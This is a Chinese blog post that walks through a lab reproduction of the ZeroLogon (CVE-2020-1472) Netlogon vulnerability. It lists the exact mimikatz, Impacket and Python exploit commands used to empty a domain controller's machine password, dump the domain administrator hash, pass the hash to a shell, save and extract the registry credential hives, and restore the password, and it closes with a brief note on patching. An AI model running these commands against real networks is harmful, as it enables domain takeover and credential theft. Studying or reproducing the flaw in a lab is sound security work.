ZeroLogon (CVE-2020-1472) 漏洞利用

已于 2022-07-03 18:49:42 修改
阅读量1.1w 收藏 13
点赞数 6
分类专栏: 漏洞利用 文章标签: 1024程序员节 安全漏洞
于 2021-10-24 17:48:10 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/captain_rb/article/details/120643838
版权
ZeroLogon (CVE-2020-1472) 是高危Windows漏洞,允许攻击者无需凭据获取域管理员权限。本文介绍了漏洞原理、影响系统,以及详细步骤演示如何验证漏洞、置空域控HASH、获取域管HASH和恢复过程。最后讨论了漏洞修复措施。
摘要由CSDN通过智能技术生成

ZeroLogon (CVE-2020-1472) 是近几年Windows上曝出的高危漏洞,CVSS V3.0评分10.0,攻击者只需要定位域控主机名及IP,并且可以访问域控,就可以在无需任何凭据的情况下 (可在域外) 拿到域管理员的权限。

文章目录

一、漏洞介绍

ZeroLogon (CVE-2020-1472) 影响域内登录认证协议Netlogon (MS-NRPC) 中所使用的加密身份验证方案 (AES-CFB8),在通过NetLogon协议与AD域控建立安全通道时,强行登录尝试,对全零的纯文本应用AES-CFB8加密将导致全零的密文,从而可以绕过正常认证,进一步可获取域管理员HASH,获取域管权限。

影响系统版本:
Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
Windows Server 2012
Windows Server 2012 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 R2 (Server Core installation)
Windows Server 2016
Windows Server 2016 (Server Core installation)
Windows Server 2019
Windows Server 2019 (Server Core installation)
Windows Server, version 1903 (Server Core installation)
Windows Server, version 1909 (Server Core installation)
Windows Server, version 2004 (Server Core installation)

二、漏洞利用

实验环境
域控制器及域信息:
OS: Microsoft Windows Server 2016 Datacenter
Hostname: DC01
IP: 192.168.43.100
Domain: main.test.com
NetBIOS Domain Name: MAIN

攻击机不在域内,但能访问域控
工具和指令均在攻击机上操作

第1步 验证漏洞存在

方法一:Mimikatz

下载新版本,需要支持ZeroLogon漏洞利用:https://github.com/gentilkiwi/mimikatz

mimikatz.exe "lsadump::zerologon /target:192.168.43.100 /account:DC01$" exit

方法二:工具 https://github.com/SecuraBV/CVE-2020-1472

python3 zerologon_tester.py DC01 192.168.43.100

第2步 置空域控HASH

注意:域控的机器帐户HASH存储在注册表中,系统启动时会将其加载到lsass,当攻击置空域控HASH后,仅AD (NTDS.DIT) 中的密码会更改,而不是注册表或加载到lsass中的密码,这样将会导致域控脱域,无法使用Kerberos进行身份验证,因此要尽快恢复。

方法一:Mimikatz

mimikatz.exe "lsadump::zerologon /target:192.168.43.100 /account:DC01$ /exploit" exit

方法二:工具 https://github.com/risksense/zerologon

python3 set_empty_pw.py DC01 192.168.43.100

方法三:工具 https://github.com/dirkjanm/CVE-2020-1472

python3 cve-2020-1472-exploit.py DC01 192.168.43.100

第3步 获取域管HASH

方法一:Mimikatz

mimikatz.exe "lsadump::dcsync /domain:main.test.com /dc:DC01 /user:administrator /authuser:DC01$ /authdomain:main /authpassword:"" /authntlm" exit

运行结果如下所示,获取域管 MAIN\Administrator 的HASH为 cf83cd7efde13e0ce754874aaa979a74
请添加图片描述
方法二:Impacket

Impacket工具包地址:https://github.com/SecureAuthCorp/impacket,利用其中的secretsdump.py工具获取域管HASH:

# 31d6cfe0d16ae931b73c59d7e0c089c0是空值的HASH
python3 secretsdump.py -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 MAIN/DC01$@192.168.43.100
OR
python3 secretsdump.py MAIN/DC01$@192.168.43.100 -just-dc -no-pass

运行结果如下所示,获取域管 MAIN\Administrator 的HASH为 cf83cd7efde13e0ce754874aaa979a74,注意此时NTDS.DIT中域控DC01$的HASH已是空值 31d6cfe0d16ae931b73c59d7e0c089c0
请添加图片描述

第4步 恢复域控HASH

Mimikatz恢复域控HASH是将NTDS.DIT中的凭证以及注册表/lsass中的凭证同时修改为 (Waza1234/Waza1234/Waza1234),并非是原本值,虽然不影响域运行,但是还是留下了痕迹。

推荐方法是恢复成原始的HASH,首先要获取注册表信息中域控原始HASH,可以利用Impacket包中的wmiexec.py、psexec.py工具获取,以wmiexec.py为例,命令中进行了HASH传递,凭证是刚刚获取的域管HASH:

python3 wmiexec.py -hashes :cf83cd7efde13e0ce754874aaa979a74 MAIN/administrator@192.168.43.100

# 获取注册表转储文件,默认存在目标机C:\目录下
# 目标机中文系统会提示解码错误,不影响使用
# /y:强制覆盖已存在文件,避免目标机C:\目录下存在同名文件,命令会询问是否覆盖,半交互环境程序会卡住
C:\>reg save HKLM\SYSTEM system.hive /y    
C:\>reg save HKLM\SAM sam.hive /y         
C:\>reg save HKLM\SECURITY security.hive /y

# 将转储文件,下载到本地
C:\>lget system.hive                    
C:\>lget sam.hive
C:\>lget security.hive

# 删除目标机上的转储文件
C:\>del /f system.hive                 
C:\>del /f sam.hive
C:\>del /f security.hive

C:\>exit

# 通过注册表转储导出HASH
secretsdump.py -sam sam.hive -system system.hive -security security.hive LOCAL

运行结果如下所示,域控密钥 (HEX) 为: 40cb3f6931f77bec7856f848751e135515d868f80b3f7f618472dfa9e83a6fac7a6c7069b7626371f7812607d47b19df6506d1b28d1e8640b06882116feae2fee977bcb6f55db375dc6181b0e4a656ab22ef183f904cbe66d4cfbfd3c13fa5c96933b0ff8b8c07a97a0b38c3c7af4c948578caa5e2842eedc63e94c47c1624cd4b952bc3cf6871cdf8367225522d71e2d754ea642550087a8a6ef91f2ab2b32d3a2f1beb0735c06a72e0e02ff89e5645edfbfb7a190c667c1356a893b831051f4e5ba2d2bea86ec59613660d66b06eb57482ec466ca21d1324b7c83d6f68778e5c66ac7e96d5ec8c6032655a5b904099,NTLM HASH为: aad3b435b51404eeaad3b435b51404ee:ecf5b7fcd090c34fedd3056ae8da65ad,注意这里与上一步抓出来的空HASH不同,因为上一步中获取的是NTDS.DIT中域控HASH记录,而这一步获取的是注册表中HASH记录

请添加图片描述
然后用工具恢复,将注册表中HASH记录同步到NTDS.DIT:

方法一:工具 https://github.com/risksense/zerologon

利用NT HASH恢复:

python3 reinstall_original_pw.py DC01 192.168.43.100 ecf5b7fcd090c34fedd3056ae8da65ad

方法二:工具 https://github.com/dirkjanm/CVE-2020-1472

利用密钥 (HEX) 恢复:

python3 restorepassword.py main/dc01@dc01 -target-ip 192.168.43.100 -hexpass 40cb3f6931f77bec7856f848751e135515d868f80b3f7f618472dfa9e83a6fac7a6c7069b7626371f7812607d47b19df6506d1b28d1e8640b06882116feae2fee977bcb6f55db375dc6181b0e4a656ab22ef183f904cbe66d4cfbfd3c13fa5c96933b0ff8b8c07a97a0b38c3c7af4c948578caa5e2842eedc63e94c47c1624cd4b952bc3cf6871cdf8367225522d71e2d754ea642550087a8a6ef91f2ab2b32d3a2f1beb0735c06a72e0e02ff89e5645edfbfb7a190c667c1356a893b831051f4e5ba2d2bea86ec59613660d66b06eb57482ec466ca21d1324b7c83d6f68778e5c66ac7e96d5ec8c6032655a5b904099

方法三:Powershell

首先利用远程执行命令工具 (wmiexec、psexec、smbexec、atexec等) 获取域控shell,然后利用powershell命令重置主机HASH,注意这种方法并不是恢复原HASH,而是将NTDS.DIT中的凭证以及注册表/lsass中的凭证重置 (随机数):

python3 wmiexec.py -hashes :cf83cd7efde13e0ce754874aaa979a74 MAIN/administrator@192.168.43.100

C:\>powershell -c Reset-ComputerMachinePassword

三、漏洞修复

参考 Microsoft安全更新程序指南,域控上安装相应补丁即可,成员机不需要。

Captain_RB
关注
专栏目录
CVE-2020-1472域渗透 NetLogon 权限提升漏洞
千寻的博客
06-13 263
模拟环境:获取了一个加入了域的计算机权限,在system账号权限的情况下,将域管密码置空,导出域管hash,然后进行连接
CVE-2020-1472漏洞复现
blue_fantasy的博客
01-14 2300
Text. 简介 2020年8月11号,微软修复了Netlogon 特权提升漏洞2020年9月11日,安全研究员Secura发布了公告,阐明了漏洞细节,之后相关的EXP也就被构造出来。该漏洞也称为“Zerologon”,CVSS评分为10.0,号称3秒撸域控,危害严重。攻击者在通过NetLogon(MS-NRPC)协议与AD域控建立安全通道时,可利用该漏洞将AD域控的计算机账号密码置为空,从而控制域控服务器。 原理 详细原理参看:ZeroLogon的利用以及分析 - 安全客,安全资讯平台 本文对
zerologon:零登录漏洞CVE-2020-1472的利用
03-17
ZeroLogon开发脚本 利用基于和代码。 Secura的原始研究和扫描仪,RiskSense Inc.的修改。 要利用该漏洞,请清除您以前安装的所有Impacket,然后从或更高版本安装Impacket。 然后做: python3 set_empty_pw DC_NETBIOS_NAME DC_IP_ADDR 如果成功的话,您将能够: secretsdump.py -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 'DOMAIN/DC_NETBIOS_NAME$@dc_ip_addr' 这应该使您成为域管理员。 完成后,使用来自secretsdump的凭据将wmiexec.py转到目标DC并执行 reg save HKLM\SYSTEM system.save reg save HKLM\SAM sam.save reg save HKLM\SE
探索网络安全新纪元:ZeroLogon 检测脚本
最新发布
gitblog_00909的博客
08-08 895
探索网络安全新纪元:ZeroLogon 检测脚本 CVE-2020-1472Test tool for CVE-2020-1472项目地址:https://gitcode.com/gh_mirrors/cv/CVE-2020-1472 在数字化时代,网络安全是我们不可忽视的重要一环。今天,我们向您推荐一款基于Python的开源工具——ZeroLogon测试脚本。这款脚本利用Impacket库来检...
CVE-2020-1472 ZeroLogon漏洞分析利用
mingyqf的博客
02-24 1430
CVE-2020-1472 ZeroLogon漏洞分析利用 暗影安全团队 2021-01-26 14:27:56 102316 0x01漏洞简介 CVE-2020-1472是一个windows域控中严重的远程权限提升漏洞,此漏洞是微软8月份发布安全公告披露的紧急漏洞,CVSS评分为10分。未经身份认证的攻击者可通过使用 Netlogon 远程协议(MS-NRPC)连接域控制器来利用此漏洞,成功利用此漏洞的攻击者可获得域管理员权限。该漏洞由 Secura 公司的 Tom Tervoort 发现提交并命名为 Z
zerologon漏洞分析
灰太的表格的博客
10-16 781
zerologon漏洞分析
探索CVE-2020-1472Zerologon漏洞修复与研究
gitblog_00084的博客
04-02 576
探索CVE-2020-1472Zerologon漏洞修复与研究 项目地址:https://gitcode.com/mstxq17/cve-2020-1472 在网络安全领域,及时发现和应对漏洞是至关重要的。项目链接提供了一个专门针对CVE-2020-1472(也称为“Zerologon”)漏洞的研究与修复工具集合,帮助安全专家、开发人员以及IT管理员更好地理解并防御这一威胁。 项目简介 该项目由...
CVE-2020-1472复现与完整利用
热门推荐
Shanfenglan's blog
10-10 14万+
CATALOG漏洞原理利用1.修改文件impacket.dcerpc.v5.nrpc2.置空机器账户yukong$密码3.读取administrator密码4.下载目标的sam文件为下一步恢复机器密码做准备5.破解sam文件查看过去的机器密码6.重制密码yukong$机器密码7.查看密码是否恢复成功 漏洞原理 原理比较复杂,有兴趣的可以看看下面链接上的文章https://www.freebuf.com/articles/system/249860.html 利用 1.修改文件impacket.dcerpc.
ZeroLogon(CVE-2020-1472) 漏洞的攻击与防御策略(上)
systemino的博客
10-27 3745
本文将从攻防角度对CVE-2020-1472进行一个简单的介绍,并对如何检测和修复ZeroLogon提出具体建议。 什么是ZeroLogon? Netlogon远程协议(也称为MS-NRPC)是一个远程进程调用(RPC)接口,仅由连接到域的设备使用。 MS-NRPC包括身份验证方法和建立Netlogon安全通道的方法。这些更新强制指定的Netlogon客户端行为,以便在成员计算机和Active Directory (AD)域控制器(DC)之间使用带有Netlogon安全通道的安全RPC。 Zero..
ZeroLogon(CVE-2020-1472) 漏洞的攻击与防御策略(下)
systemino的博客
10-11 1240
上文我们介绍了攻击原理,本文我们将详细介绍可以发起的攻击种类和防御措施。 攻击种类 计算机/设备帐户本质上与用户帐户相同,如果配置错误,可能同样危险。因此,可以利用计算机帐户密码/哈希值进行一些其他攻击: 1.银票攻击; 2.金票攻击; 3.过时的DNS条目; 4.攻击的替代方法。 金票和银票攻击通过利用Kerberos票据授予服务(TGS)来伪造票据。金票和银票攻击的主要区别在于银票只允许攻击者伪造特定服务的TGS票。这两者都可以被利用,因为Zerologon允许攻击者更改计算机帐户密码..
Zerologon-CVE-2020-1472-master
09-11
Zerologon-CVE-2020-1472】是2020年发现的一个严重网络安全漏洞,主要影响的是微软的Windows Server操作系统。这个漏洞被命名为"Zerologon",因为它允许攻击者在没有密码或任何身份验证的情况下完全控制网络中的域...
利用ZeroLogon漏洞接管域控权限
Zlirving_的博客
02-25 2100
目录漏洞介绍实验环境实验开始进入域漏洞验证漏洞利用置空域控密码获取新凭据获取域控半交互式shell获取初始凭据(sam)还原域控密码 漏洞介绍 CVE-2020-14722 (又称ZeroLogon) 是一个windows域控中严重的远程权限提升漏洞。它是因为微软在Netlogon协议中没有正确使用加密算法而导致的漏洞。由于微软在进行AES加密运算过程中,使用了AES-CFB8模式并且错误的将IV设置为全零,这使得攻击者在明文(client challenge)、IV等要素可控的情况下,存在较高概率使得产生
探秘ZeroLogon:Windows域控安全漏洞的克星
gitblog_00088的博客
04-04 554
探秘ZeroLogon:Windows域控安全漏洞的克星 项目地址:https://gitcode.com/Rvn0xsy/ZeroLogon 零日攻击(Zero-Day)是网络安全领域的一种严重威胁,而ZeroLogon则是2020年发现的一个影响Windows域控制器的重大漏洞。本文将深入探讨ZeroLogon项目,这是一个开源工具,旨在帮助系统管理员检测并修复此漏洞。 项目简介 ZeroLo...
CVE-2020-1472域内提权漏洞
xhwfa的博客
03-15 3942
一、漏洞简介 2020年8月11号,微软修复了Netlogon特权提升漏洞2020年9月11日,安全研究员Secura发布了公告,阐明了漏洞细节,之后相关的EXP也就被构造出来。该漏洞也称为“Zerologon”,CVSS评分为10.0,号称3秒撸域控,危害严重。攻击者在通过NetLogon(MS-NRPC)协议与AD域控建立安全通道时,可利用该漏洞将AD域控的计算机账号密码置为空,从而控制域控服务器。 二、漏洞环境搭建 域控:windows server 2008 R2,IP:192.168.16
(域渗透提权)CVE-2020-1472 NetLogon权限提升漏洞
m0_64481831的博客
07-02 294
CVE-2020-1472是继永恒之蓝漏洞之后又一个好用的内网提权漏洞,影响Windows Server2008R2至2019的版本。只要攻击者能够访问到目标域控并且知道域控计算机名即可利用该漏洞。该漏洞不要求当前计算机在域内,也不要求当前计算机操作系统为Windows,该漏洞的稳定利用方式为重置目标域控的密码,然后利用域控凭证进行DC Sync获取域管权限后修复域控密码。漏洞利用过程中会重置域控存储在域中的凭证,而域控存储在域中的凭证域本地的注册表中的凭证不一致时,会导致目标域控脱域,所以在。
内网定位+CVE-2020-1472-利用过程
课嗨教育的专栏
04-01 278
域控(Win2008):192.168.199.131 域用户(Win7):192.168.199.128 域用户(Win03):192.168.199.129 漏洞验证工具:https://github.com/SecuraBV/CVE-2020-1472 利用+重置工具:https://github.com/risksense/zerologon 重置 hexpass 工具:https://github.com/dirkjanm/CVE-2020-1472 工具运行环境:http
CVE-2020-1472 Netlogon权限提升漏洞分析
further_eye的博客
11-09 1132
漏洞主要是由于在使用Netlogon安全通道与域控进行连接时,由于认证协议加密部分的缺陷,导致攻击者可以将域控管理员用户的密码置为空,从而进一步实现密码hash获取并最终获得管理员权限。成功的利用可以实现以管理员权限登录域控设备,并进一步控制整个域。
探索ZeroLogon:解决Windows域控制器安全漏洞的利器
gitblog_00003的博客
04-15 480
探索ZeroLogon:解决Windows域控制器安全漏洞的利器 zerologon项目地址:https://gitcode.com/gh_mirrors/ze/zerologon 项目简介 是一个开源项目,由RiskSense公司开发并维护。该项目主要针对网络安全领域的一个重大威胁——CVE-2020-1472(也被称作“ZeroLogon”漏洞)提供检测和缓解工具。此漏洞影响了Windows...
域渗透ZeroLogon(CVE-2020-1472)
Longwaer
01-28 2893
学习了解ZeroLogon漏洞的原理及利用方式,更快的掌握域内渗透的技巧,从而实现技能提升。
CVE-2020-15778 漏洞利用
09-01
很抱歉,但我无法提供关于CVE-2020-15778漏洞利用的引用内容。根据我所了解的,CVE-2020-15778是一个具有远程执行代码风险的漏洞,但我无法提供具体的漏洞利用信息。如果您对该漏洞有任何疑问,建议您查阅相关的安全公告和资料,以了解更多详细信息和相应的修复方法。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [SAP_RECON:CVE-2020-6287,CVE-2020-6286的PoC(SAP RECON漏洞)](https://download.csdn.net/download/weixin_42099530/16285854)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* *3* [CVE-2020-15778漏洞复现](https://blog.csdn.net/m0_58606546/article/details/121630058)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值